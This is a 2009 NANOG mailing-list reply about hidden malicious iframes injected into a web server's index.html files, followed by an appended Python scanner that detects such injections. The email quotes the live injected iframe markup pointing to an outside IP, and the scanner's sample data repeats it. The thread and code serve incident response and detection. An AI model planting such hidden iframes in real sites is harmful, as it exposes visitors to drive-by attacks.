Malicious code just found on web server

Neil kngspook at gmail.com
Mon Apr 20 16:47:59 UTC 2009


On Fri, Apr 17, 2009 at 4:39 PM, Russell Berg <berg at wins.net> wrote:

> We just discovered what we suspect is malicious code appended to all
> index.html files on our web server as of the 11:00 central time hour today:
>
> src="http://77.92.158.122/webmail/inc/web/index.php"
> style="display: none;" height="0" width="0"></iframe>
> <iframe src="http://77.92.158.122/webmail/inc/web/index.php"
> style="display: none;" height="0" width="0"></iframe> </body> </html>
>
> IP address resolves to mail.yaris.com; couldn't find any A/V site
> references to this.
>
> Google search reveals some Chinese sites with references to the URL today,
> but nothing substantial in the translation.
>
> Just a heads up for folks; we have a team investigating...
>
> Russell Berg
> Dir - Product Development
> Airstream Communications
> berg at wins.net
> 715-832-3726
>
>
I've run into this sort of attack before, where they change the page to load
content from elsewhere; but I couldn't figure out how they managed to write
to the sites' pages.  They were hosted on a commercial webhost, and so if it
was a compromised host (which seemed like the only possibility to me), that
didn't speak well for the hosting company.

We were having issues with the company anyway, though; so I took down the
site, sanitized the pages (and removed a bunch of junk), and put the site
back up with another company.

But if you figure out how they got write access to a static website, I'd
love to hear it.

-N.
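For anyone doing the same triage on their own web root, the following is an added example (editor's code, not from either poster) of a scanner for the kind of injection described above: it walks a directory tree, parses every `<iframe>` in the HTML files it finds, and flags frames that are both hidden (display:none / visibility:hidden or zero height and width) and point at a host that is not one of the site's own. The sample site it builds is constructed here for illustration; the payload text is the one quoted from Russell's message, the site hostnames (example.org) and the file timestamps are assumptions. It also accepts an optional modification-time cutoff, matching the "as of the 11:00 hour" observation, and the sample deliberately includes an injected page with an old timestamp to show why that filter alone is not enough.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Any <iframe ...> start tag, case-insensitive.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# name="value", name='value' or name=value inside a tag.
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*("([^"]*)"|\'([^\']*)\'|([^\s>]+))')


def parse_attrs(tag):
    """Return the attributes of one start tag as a lower-cased dict."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        value = m.group(3)
        if value is None:
            value = m.group(4) if m.group(4) is not None else m.group(5)
        attrs[m.group(1).lower()] = value
    return attrs


def is_hidden(attrs):
    """Hidden via inline style, or collapsed to a 0x0 box as in the thread's payload."""
    style = attrs.get("style", "").replace(" ", "").lower()
    hidden_style = "display:none" in style or "visibility:hidden" in style
    zero_size = (attrs.get("height", "").strip() in ("0", "0px")
                 and attrs.get("width", "").strip() in ("0", "0px"))
    return hidden_style or zero_size


def is_external(src, own_hosts):
    """True when the src names a host other than the site's own; relative URLs are local."""
    host = urlparse(src).hostname
    return host is not None and host.lower() not in own_hosts


def find_suspicious_iframes(html, own_hosts):
    """Return the src of every hidden iframe that loads from a foreign host."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(0))
        src = attrs.get("src", "")
        if is_hidden(attrs) and is_external(src, own_hosts):
            hits.append(src)
    return hits


def scan_webroot(root, own_hosts, since=None, suffixes=(".html", ".htm")):
    """Map relative path -> list of suspicious iframe srcs for every HTML file under root.

    since: optional epoch seconds; files whose mtime is older are skipped. An attacker
    can reset timestamps (or the injection may predate the window), so a scan without
    the cutoff is the authoritative one; the cutoff is only a quick first pass.
    """
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(suffixes):
                continue
            path = os.path.join(dirpath, name)
            if since is not None and os.path.getmtime(path) < since:
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_suspicious_iframes(fh.read(), own_hosts)
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


def build_sample_webroot():
    """Constructed sample site (not real data): a legitimate visible iframe, a clean
    page, and pages carrying the hidden-iframe payload quoted in the thread, one of
    them with an old mtime to simulate a timestamp the attacker did not disturb."""
    root = tempfile.mkdtemp(prefix="webroot_")
    legit = ('<html><body><iframe src="https://www.example.org/widget" '
             'height="200" width="300"></iframe></body></html>\n')
    clean = "<html><body><h1>Hello</h1></body></html>\n"
    injected = ('<html><body><p>Welcome</p>\n'
                '<iframe src="http://77.92.158.122/webmail/inc/web/index.php" '
                'style="display: none;" height="0" width="0"></iframe>\n'
                '<iframe src="http://77.92.158.122/webmail/inc/web/index.php" '
                'style="display: none;" height="0" width="0"></iframe> </body> </html>\n')
    os.makedirs(os.path.join(root, "blog"))
    os.makedirs(os.path.join(root, "docs"))
    # (relative path, body, assumed mtime in epoch seconds)
    for rel, body, mtime in [("index.html", legit, 1_000_000),
                             ("docs/index.html", injected, 1_000_000),
                             ("blog/index.html", injected, 2_000_000),
                             ("blog/about.html", injected, 2_000_000)]:
        path = os.path.join(root, rel)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.utime(path, (mtime, mtime))
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    for path, srcs in sorted(scan_webroot(root, {"www.example.org", "example.org"}).items()):
        print(path, "->", srcs)
```

Run against a real web root, replace the sample hostnames with the site's own and drop the `since` cutoff for the final pass; the injected `docs/index.html` in the sample is exactly the file a mtime-only search would miss. Finding the files is only the first step: the question Neil raises, how the attacker obtained write access, still needs the FTP/SSH/control-panel logs and a check of any admin workstation for stolen credentials.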



More information about the NANOG mailing list